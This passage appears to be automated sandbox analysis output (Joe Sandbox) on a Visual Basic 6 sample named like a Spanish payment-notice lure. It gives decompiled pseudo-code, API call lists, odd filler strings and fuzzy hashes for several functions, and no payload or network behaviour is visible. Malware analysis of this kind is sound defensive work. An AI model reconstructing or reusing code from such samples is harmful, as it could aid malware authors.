				 *[fs:0x0] = _t286;
				_push(0x74);
				L00401350();
				_v12 = _t286;
				_v8 = 0x401260;
				L004014E2();
				_push(2);
				_push(0x403ec4);
				_push( &_v48);
				L004014B8();
				_push(L"Eksperimenternes");
				_push(L"Finansierings");
				_push(L"Confabulatory");
				_push(L"ministerstormens"); // executed
				L004014B2(); // executed
				if( *0x422010 != 0) {
					_v84 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v84 = 0x422010;
				}
				_t170 =  &_v60;
				L00401566();
				_v72 = _t170;
				_t174 =  *((intOrPtr*)( *_v72 + 0x1f0))(_v72,  &_v64, _t170,  *((intOrPtr*)( *((intOrPtr*)( *_v84)) + 0x2fc))( *_v84));
				asm("fclex");
				_v76 = _t174;
				if(_v76 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x1f0);
					_push(0x403c90);
					_push(_v72);
					_push(_v76);
					L00401572();
					_v88 = _t174;
				}
				 *_v36 = _v64;
				L0040156C();
				if( *0x422010 != 0) {
					_v92 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v92 = 0x422010;
				}
				_t179 =  &_v60;
				L00401566();
				_v72 = _t179;
				_t183 =  *((intOrPtr*)( *_v72 + 0x98))(_v72,  &_v64, _t179,  *((intOrPtr*)( *((intOrPtr*)( *_v92)) + 0x30c))( *_v92));
				asm("fclex");
				_v76 = _t183;
				if(_v76 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0x98);
					_push(0x403cfc);
					_push(_v72);
					_push(_v76);
					L00401572();
					_v96 = _t183;
				}
				 *((short*)(_v36 + 2)) = _v64;
				L0040156C();
				if( *0x422010 != 0) {
					_v100 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v100 = 0x422010;
				}
				_t188 =  &_v60;
				L00401566();
				_v72 = _t188;
				_t192 =  *((intOrPtr*)( *_v72 + 0x178))(_v72,  &_v64, _t188,  *((intOrPtr*)( *((intOrPtr*)( *_v100)) + 0x308))( *_v100));
				asm("fclex");
				_v76 = _t192;
				if(_v76 >= 0) {
					_v104 = _v104 & 0x00000000;
				} else {
					_push(0x178);
					_push(0x403cfc);
					_push(_v72);
					_push(_v76);
					L00401572();
					_v104 = _t192;
				}
				_t193 = 2;
				 *((short*)(_v36 + (_t193 << 1))) = _v64;
				L0040156C();
				if( *0x422010 != 0) {
					_v108 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v108 = 0x422010;
				}
				_t198 =  &_v60;
				L00401566();
				_v72 = _t198;
				_t202 =  *((intOrPtr*)( *_v72 + 0x98))(_v72,  &_v64, _t198,  *((intOrPtr*)( *((intOrPtr*)( *_v108)) + 0x30c))( *_v108));
				asm("fclex");
				_v76 = _t202;
				if(_v76 >= 0) {
					_v112 = _v112 & 0x00000000;
				} else {
					_push(0x98);
					_push(0x403cfc);
					_push(_v72);
					_push(_v76);
					L00401572();
					_v112 = _t202;
				}
				_t203 = 2;
				 *((short*)(_v36 + _t203 * 3)) = _v64;
				L0040156C();
				_t205 = 2;
				 *((short*)(_v36 + (_t205 << 2))) = 0x1b7c;
				if( *0x422010 != 0) {
					_v116 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v116 = 0x422010;
				}
				_t210 =  &_v60;
				L00401566();
				_v72 = _t210;
				_t214 =  *((intOrPtr*)( *_v72 + 0x168))(_v72,  &_v64, _t210,  *((intOrPtr*)( *((intOrPtr*)( *_v116)) + 0x2fc))( *_v116));
				asm("fclex");
				_v76 = _t214;
				if(_v76 >= 0) {
					_v120 = _v120 & 0x00000000;
				} else {
					_push(0x168);
					_push(0x403c90);
					_push(_v72);
					_push(_v76);
					L00401572();
					_v120 = _t214;
				}
				_t215 = 2;
				 *((short*)(_v36 + _t215 * 5)) = _v64;
				L0040156C();
				if( *0x422010 != 0) {
					_v124 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v124 = 0x422010;
				}
				_t220 =  &_v60;
				L00401566();
				_v72 = _t220;
				_t224 =  *((intOrPtr*)( *_v72 + 0xf8))(_v72,  &_v64, _t220,  *((intOrPtr*)( *((intOrPtr*)( *_v124)) + 0x308))( *_v124));
				asm("fclex");
				_v76 = _t224;
				if(_v76 >= 0) {
					_v128 = _v128 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x403cfc);
					_push(_v72);
					_push(_v76);
					L00401572();
					_v128 = _t224;
				}
				_t225 = 2;
				 *((short*)(_v36 + _t225 * 6)) = _v64;
				L0040156C();
				L004014AC();
				if( *0x422010 != 0) {
					_v132 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v132 = 0x422010;
				}
				_t230 =  &_v60;
				L00401566();
				_v72 = _t230;
				_t234 =  *((intOrPtr*)( *_v72 + 0x168))(_v72,  &_v64, _t230,  *((intOrPtr*)( *((intOrPtr*)( *_v132)) + 0x2fc))( *_v132));
				asm("fclex");
				_v76 = _t234;
				if(_v76 >= 0) {
					_v136 = _v136 & 0x00000000;
				} else {
					_push(0x168);
					_push(0x403c90);
					_push(_v72);
					_push(_v76);
					L00401572();
					_v136 = _t234;
				}
				_v24 = _v64;
				L0040156C();
				_push(0x41f5bf);
				_v68 =  &_v48;
				_t237 =  &_v68;
				_push(_t237);
				_push(0);
				L004014D6();
				L00401554();
				return _t237;
			}

0x0041f0f2
0x0041f0fd
0x0041f0fe
0x0041f105
0x0041f108
0x0041f110
0x0041f113
0x0041f120
0x0041f125
0x0041f127
0x0041f12f
0x0041f130
0x0041f135
0x0041f13a
0x0041f13f
0x0041f144
0x0041f149
0x0041f155
0x0041f16f
0x0041f157
0x0041f157
0x0041f15c
0x0041f161
0x0041f166
0x0041f166
0x0041f18a
0x0041f18e
0x0041f193
0x0041f1a2
0x0041f1a8
0x0041f1aa
0x0041f1b1
0x0041f1cd
0x0041f1b3
0x0041f1b3
0x0041f1b8
0x0041f1bd
0x0041f1c0
0x0041f1c3
0x0041f1c8
0x0041f1c8
0x0041f1d8
0x0041f1de
0x0041f1ea
0x0041f204
0x0041f1ec
0x0041f1ec
0x0041f1f1
0x0041f1f6
0x0041f1fb
0x0041f1fb
0x0041f21f
0x0041f223
0x0041f228
0x0041f237
0x0041f23d
0x0041f23f
0x0041f246
0x0041f262
0x0041f248
0x0041f248
0x0041f24d
0x0041f252
0x0041f255
0x0041f258
0x0041f25d
0x0041f25d
0x0041f26d
0x0041f274
0x0041f280
0x0041f29a
0x0041f282
0x0041f282
0x0041f287
0x0041f28c
0x0041f291
0x0041f291
0x0041f2b5
0x0041f2b9
0x0041f2be
0x0041f2cd
0x0041f2d3
0x0041f2d5
0x0041f2dc
0x0041f2f8
0x0041f2de
0x0041f2de
0x0041f2e3
0x0041f2e8
0x0041f2eb
0x0041f2ee
0x0041f2f3
0x0041f2f3
0x0041f2fe
0x0041f308
0x0041f30f
0x0041f31b
0x0041f335
0x0041f31d
0x0041f31d
0x0041f322
0x0041f327
0x0041f32c
0x0041f32c
0x0041f350
0x0041f354
0x0041f359
0x0041f368
0x0041f36e
0x0041f370
0x0041f377
0x0041f393
0x0041f379
0x0041f379
0x0041f37e
0x0041f383
0x0041f386
0x0041f389
0x0041f38e
0x0041f38e
0x0041f399
0x0041f3a4
0x0041f3ab
0x0041f3b2
0x0041f3b9
0x0041f3c6
0x0041f3e0
0x0041f3c8
0x0041f3c8
0x0041f3cd
0x0041f3d2
0x0041f3d7
0x0041f3d7
0x0041f3fb
0x0041f3ff
0x0041f404
0x0041f413
0x0041f419
0x0041f41b
0x0041f422
0x0041f43e
0x0041f424
0x0041f424
0x0041f429
0x0041f42e
0x0041f431
0x0041f434
0x0041f439
0x0041f439
0x0041f444
0x0041f44f
0x0041f456
0x0041f462
0x0041f47c
0x0041f464
0x0041f464
0x0041f469
0x0041f46e
0x0041f473
0x0041f473
0x0041f497
0x0041f49b
0x0041f4a0
0x0041f4af
0x0041f4b5
0x0041f4b7
0x0041f4be
0x0041f4da
0x0041f4c0
0x0041f4c0
0x0041f4c5
0x0041f4ca
0x0041f4cd
0x0041f4d0
0x0041f4d5
0x0041f4d5
0x0041f4e0
0x0041f4eb
0x0041f4f2
0x0041f4f7
0x0041f503
0x0041f51d
0x0041f505
0x0041f505
0x0041f50a
0x0041f50f
0x0041f514
0x0041f514
0x0041f538
0x0041f53c
0x0041f541
0x0041f550
0x0041f556
0x0041f558
0x0041f55f
0x0041f57e
0x0041f561
0x0041f561
0x0041f566
0x0041f56b
0x0041f56e
0x0041f571
0x0041f576
0x0041f576
0x0041f589
0x0041f590
0x0041f595
0x0041f5a8
0x0041f5ab
0x0041f5ae
0x0041f5af
0x0041f5b1
0x0041f5b9
0x0041f5be

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 0041F108
__vbaStrCopy.MSVBVM60(?,?,?,?,00401356), ref: 0041F120
__vbaAryConstruct2.MSVBVM60(?,00403EC4,00000002,?,?,?,?,00401356), ref: 0041F130
#690.MSVBVM60(ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EC4,00000002,?,?,?,?,00401356), ref: 0041F149
__vbaNew2.MSVBVM60(00403270,00422010,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EC4,00000002,?,?,?,?,00401356), ref: 0041F161
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EC4,00000002), ref: 0041F18E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C90,000001F0,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EC4), ref: 0041F1C3
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EC4,00000002), ref: 0041F1DE
__vbaNew2.MSVBVM60(00403270,00422010,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EC4,00000002), ref: 0041F1F6
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EC4), ref: 0041F223
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000098,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes), ref: 0041F258
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EC4,00000002), ref: 0041F274
__vbaNew2.MSVBVM60(00403270,00422010,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EC4), ref: 0041F28C
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes), ref: 0041F2B9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000178,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory), ref: 0041F2EE
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EC4), ref: 0041F30F
__vbaNew2.MSVBVM60(00403270,00422010,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes), ref: 0041F327
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory), ref: 0041F354
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000098), ref: 0041F389
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes), ref: 0041F3AB
__vbaNew2.MSVBVM60(00403270,00422010,?,?,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory), ref: 0041F3D2
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041F3FF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C90,00000168), ref: 0041F434
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory), ref: 0041F456
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041F46E
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041F49B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,000000F8), ref: 0041F4D0
__vbaFreeObj.MSVBVM60(00000000,?,00403CFC,000000F8), ref: 0041F4F2
#598.MSVBVM60(00000000,?,00403CFC,000000F8), ref: 0041F4F7
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041F50F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041F53C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C90,00000168), ref: 0041F571
__vbaFreeObj.MSVBVM60(00000000,?,00403C90,00000168), ref: 0041F590
__vbaAryDestruct.MSVBVM60(00000000,?,0041F5BF), ref: 0041F5B1
__vbaFreeStr.MSVBVM60(00000000,?,0041F5BF), ref: 0041F5B9

Strings

ministerstormens, xrefs: 0041F144
Eksperimenternes, xrefs: 0041F135
Finansierings, xrefs: 0041F13A
Confabulatory, xrefs: 0041F13F

Memory Dump Source

Source File: 00000000.00000002.1192664197.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1192652913.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192685912.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192700655.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirming - Aviso de pago.jbxd

Similarity

API ID: __vba$Free$CheckHresultNew2$#598#690ChkstkConstruct2CopyDestruct
String ID: Confabulatory$Eksperimenternes$Finansierings$ministerstormens
API String ID: 2817960149-3291121498
Opcode ID: 7fb01379f7d1d60ba11edbf2fe156da3909fc3648812e2f0ee77d3bd0ef008ee
Instruction ID: 45aa0ee7b98f743cd43736ee59f24f54fef9cbbb71d7c4baa0ef8a0cf9625b4b
Opcode Fuzzy Hash: 7fb01379f7d1d60ba11edbf2fe156da3909fc3648812e2f0ee77d3bd0ef008ee
Instruction Fuzzy Hash: 2AE10A75E40208EFCB10EFA0D945FDDBBB5BF08705F20406AE502BB2A1DB796946DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00420F2D, Relevance: 15.1, APIs: 10, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E00420F2D(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				char _v72;
				signed int _v76;
				signed int _v84;
				signed int _v88;
				signed int _t50;
				signed int _t62;
				void* _t67;
				void* _t74;
				intOrPtr _t76;

				_t67 = __edx;
				 *[fs:0x0] = _t76;
				L00401350();
				_v12 = _t76;
				_v8 = 0x401330;
				L004013FE();
				_t50 =  *((intOrPtr*)( *_a4 + 0x58))(_a4,  &_v72,  &_v24, _a4, __edi, __esi, __ebx, 0x44,  *[fs:0x0], 0x401356, __ecx, __ecx, _t74);
				asm("fclex");
				_v76 = _t50;
				if(_v76 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x4038f4);
					_push(_a4);
					_push(_v76);
					L00401572();
					_v84 = _t50;
				}
				_v32 = _v72;
				L004013FE();
				L004013F8();
				_v28 = E0042123A( &_v36);
				L0040156C();
				_v32 = E0042123A(_v28) + 0x2b0;
				E004212A1(_t67, _v32, _a8);
				_v60 = 0x80020004;
				_v68 = 0xa;
				_v44 = 0x80020004;
				_v52 = 0xa;
				L00401350();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401350();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t62 =  *((intOrPtr*)( *_a4 + 0x2b0))(_a4, 0x10, 0x10,  &_v36,  &_v36, _a4);
				asm("fclex");
				_v76 = _t62;
				if(_v76 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x2b0);
					_push(0x4038f4);
					_push(_a4);
					_push(_v76);
					L00401572();
					_v88 = _t62;
				}
				_push(0x421070);
				L0040156C();
				return _t62;
			}

0x00420f2d
0x00420f3e
0x00420f48
0x00420f50
0x00420f53
0x00420f61
0x00420f72
0x00420f75
0x00420f77
0x00420f7e
0x00420f97
0x00420f80
0x00420f80
0x00420f82
0x00420f87
0x00420f8a
0x00420f8d
0x00420f92
0x00420f92
0x00420f9e
0x00420fa8
0x00420fb1
0x00420fbc
0x00420fc2
0x00420fd4
0x00420fdd
0x00420fe2
0x00420fe9
0x00420ff0
0x00420ff7
0x00421001
0x0042100b
0x0042100c
0x0042100d
0x0042100e
0x00421012
0x0042101c
0x0042101d
0x0042101e
0x0042101f
0x00421028
0x0042102e
0x00421030
0x00421037
0x00421053
0x00421039
0x00421039
0x0042103e
0x00421043
0x00421046
0x00421049
0x0042104e
0x0042104e
0x00421057
0x0042106a
0x0042106f

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 00420F48
__vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401356), ref: 00420F61
__vbaHresultCheckObj.MSVBVM60(00000000,?,004038F4,00000058), ref: 00420F8D
__vbaObjSetAddref.MSVBVM60(?,?), ref: 00420FA8
#644.MSVBVM60(?,?,?), ref: 00420FB1
__vbaFreeObj.MSVBVM60(00000000,?,?,?), ref: 00420FC2
__vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 00421001
__vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 00421012
__vbaHresultCheckObj.MSVBVM60(00000000,?,004038F4,000002B0), ref: 00421049
__vbaFreeObj.MSVBVM60(00421070), ref: 0042106A

Memory Dump Source

Source File: 00000000.00000002.1192664197.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1192652913.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192685912.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192700655.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirming - Aviso de pago.jbxd

Similarity

API ID: __vba$Chkstk$AddrefCheckFreeHresult$#644
String ID:
API String ID: 1032928638-0
Opcode ID: bc22c7d3973b8adcbfaa735da4b970b30edad76f53021f8875029a91ae681798
Instruction ID: 89e0929c79d69c06d9c8683e19a072bdc060dacef5b549b1683b6227698d1982
Opcode Fuzzy Hash: bc22c7d3973b8adcbfaa735da4b970b30edad76f53021f8875029a91ae681798
Instruction Fuzzy Hash: 0B412871900218EFDF01EF91D846BDEBBB5FF05748F50402AF901BB1A1C7B99A869B58

Uniqueness

Uniqueness Score: -1.00%

Function 0041ECBC, Relevance: 13.6, APIs: 9, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 52%

			E0041ECBC(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				char _v28;
				intOrPtr _v36;
				char _v44;
				char _v64;
				intOrPtr* _v68;
				signed int _v72;
				intOrPtr* _v80;
				signed int _v84;
				char* _t34;
				signed int _t38;
				char* _t40;
				intOrPtr _t55;

				_push(0x401356);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t55;
				_push(0x40);
				L00401350();
				_v12 = _t55;
				_v8 = 0x401238;
				if( *0x422010 != 0) {
					_v80 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v80 = 0x422010;
				}
				_t34 =  &_v28;
				L00401566();
				_v68 = _t34;
				_t38 =  *((intOrPtr*)( *_v68 + 0x58))(_v68,  &_v64, _t34,  *((intOrPtr*)( *((intOrPtr*)( *_v80)) + 0x2fc))( *_v80));
				asm("fclex");
				_v72 = _t38;
				if(_v72 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x403c90);
					_push(_v68);
					_push(_v72);
					L00401572();
					_v84 = _t38;
				}
				_v36 = _v64;
				_v44 = 3;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_t40 =  &_v44;
				_push(_t40); // executed
				L004014D0(); // executed
				L00401560();
				L0040156C();
				L0040157E();
				_push(0x41edbf);
				L00401554();
				return _t40;
			}

0x0041ecc1
0x0041eccc
0x0041eccd
0x0041ecd4
0x0041ecd7
0x0041ecdf
0x0041ece2
0x0041ecf0
0x0041ed0a
0x0041ecf2
0x0041ecf2
0x0041ecf7
0x0041ecfc
0x0041ed01
0x0041ed01
0x0041ed25
0x0041ed29
0x0041ed2e
0x0041ed3d
0x0041ed40
0x0041ed42
0x0041ed49
0x0041ed62
0x0041ed4b
0x0041ed4b
0x0041ed4d
0x0041ed52
0x0041ed55
0x0041ed58
0x0041ed5d
0x0041ed5d
0x0041ed69
0x0041ed6c
0x0041ed73
0x0041ed75
0x0041ed77
0x0041ed79
0x0041ed7b
0x0041ed7e
0x0041ed7f
0x0041ed89
0x0041ed91
0x0041ed99
0x0041ed9e
0x0041edb9
0x0041edbe

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 0041ECD7
__vbaNew2.MSVBVM60(00403270,00422010,?,?,?,?,00401356), ref: 0041ECFC
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041ED29
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C90,00000058), ref: 0041ED58
#704.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041ED7F
__vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041ED89
__vbaFreeObj.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041ED91
__vbaFreeVar.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041ED99
__vbaFreeStr.MSVBVM60(0041EDBF,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041EDB9

Memory Dump Source

Source File: 00000000.00000002.1192664197.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1192652913.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192685912.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192700655.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirming - Aviso de pago.jbxd

Similarity

API ID: __vba$Free$#704CheckChkstkHresultMoveNew2
String ID:
API String ID: 2174863854-0
Opcode ID: c29ea94211ff7c7a796b64b5fc4e23e77ec4a43a46bdaec3011b84d6f319217e
Instruction ID: 5b6056bbb3b761e8cb7d2427814385406f859d6db53b5faf809a43ea79a9c101
Opcode Fuzzy Hash: c29ea94211ff7c7a796b64b5fc4e23e77ec4a43a46bdaec3011b84d6f319217e
Instruction Fuzzy Hash: 51314970D00209ABCB10DF91DD46FDDBBB9BB05714F20422AF512B71E0DB785945CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00421083, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00421083(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v40;
				char _v72;
				char _v88;
				intOrPtr _v96;
				intOrPtr _v104;
				char* _t33;
				void* _t36;
				void* _t46;
				void* _t48;
				intOrPtr _t49;

				_t49 = _t48 - 0xc;
				 *[fs:0x0] = _t49;
				L00401350();
				_v16 = _t49;
				_v12 = 0x401340;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x58,  *[fs:0x0], 0x401356, _t46);
				 *_a8 =  *_a8 & 0x00000000;
				E004212FB();
				_v96 = 2;
				_v104 = 2;
				L004013F2();
				_v96 = 0x808b46;
				_v104 = 3;
				L004013F2();
				_t33 =  &_v88;
				L004013EC();
				L00401506();
				_t36 =  *((intOrPtr*)( *_a4 + 0x72c))(_a4, _t33, _t33, _t33,  &_v40,  &_v72);
				_push(0x421159);
				L0040157E();
				L0040157E();
				return _t36;
			}

0x00421086
0x00421095
0x0042109f
0x004210a7
0x004210aa
0x004210b1
0x004210c0
0x004210c6
0x004210c9
0x004210ce
0x004210d5
0x004210e2
0x004210e7
0x004210ee
0x004210fb
0x00421108
0x0042110c
0x00421112
0x00421120
0x00421126
0x0042114b
0x00421153
0x00421158

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 0042109F

Part of subcall function 004212FB: __vbaChkstk.MSVBVM60(?,004210CE,?,?,?,?,00401356), ref: 00421301
Part of subcall function 004212FB: #644.MSVBVM60(?,?,004210CE,?,?,?,?,00401356), ref: 0042132B

__vbaVarMove.MSVBVM60 ref: 004210E2
__vbaVarMove.MSVBVM60 ref: 004210FB
__vbaVarIdiv.MSVBVM60(?,?,?), ref: 0042110C
__vbaI4Var.MSVBVM60(00000000,?,?,?), ref: 00421112
__vbaFreeVar.MSVBVM60(00421159), ref: 0042114B
__vbaFreeVar.MSVBVM60(00421159), ref: 00421153

Memory Dump Source

Source File: 00000000.00000002.1192664197.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1192652913.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192685912.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192700655.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirming - Aviso de pago.jbxd

Similarity

API ID: __vba$ChkstkFreeMove$#644Idiv
String ID:
API String ID: 1258935826-0
Opcode ID: 1043e987ef84a9454b570cff8104b880686f4b51f8c633a91678399d1fe64c3f
Instruction ID: 0f8d2835dd7f5b445a520358de73763d1c327c536856f47d1f58ca737eb7ce15
Opcode Fuzzy Hash: 1043e987ef84a9454b570cff8104b880686f4b51f8c633a91678399d1fe64c3f
Instruction Fuzzy Hash: 6111B771900248AFDB01EFD5C986BDEBBB8EF04744F50846AF506AB1A1D778AA09CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004015A8, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			_entry_(signed int __eax, intOrPtr* __edx) {
				intOrPtr* _t2;

				_push("VB5!6&*"); // executed
				L004015A2(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t2 = __eax - 1;
				 *_t2 =  *_t2 + _t2;
				 *_t2 =  *_t2 + _t2;
				 *_t2 =  *_t2 + _t2;
				 *__edx =  *__edx + __edx;
				return _t2;
			}

0x004015a8
0x004015ad
0x004015b2
0x004015b4
0x004015b6
0x004015b8
0x004015ba
0x004015bc
0x004015bd
0x004015bf
0x004015c1
0x004015c3
0x004015c5

APIs

#100.MSVBVM60(VB5!6&*), ref: 004015AD

Strings

VB5!6&*, xrefs: 004015A8

Memory Dump Source

Source File: 00000000.00000002.1192664197.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1192652913.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192685912.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192700655.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirming - Aviso de pago.jbxd

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 0230efafd382bcc084a8476777f1e0e3b0e0ef68bf5ea8d219aeea90f86aeea4
Instruction ID: 9cca0ee8440cfc00a5e1898d152da764cda9b38731d201ff067470609a6d17cb
Opcode Fuzzy Hash: 0230efafd382bcc084a8476777f1e0e3b0e0ef68bf5ea8d219aeea90f86aeea4
Instruction Fuzzy Hash: 58D0A44148E7C51EE30716750AA24462F300C972A038B00E38481EE0E3C09C0989C326

Uniqueness

Uniqueness Score: -1.00%

Function 00403B94, Relevance: .0, Instructions: 8
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1192664197.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1192652913.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192685912.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192700655.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirming - Aviso de pago.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51fb39216969d26fc78aed97ac1f5df417eba3df0f246375f867baeb2433c3a0
Instruction ID: 6804de4653490005b3518abec5aef3bdb5d4b95143dff122f7f773279e24e3e6
Opcode Fuzzy Hash: 51fb39216969d26fc78aed97ac1f5df417eba3df0f246375f867baeb2433c3a0
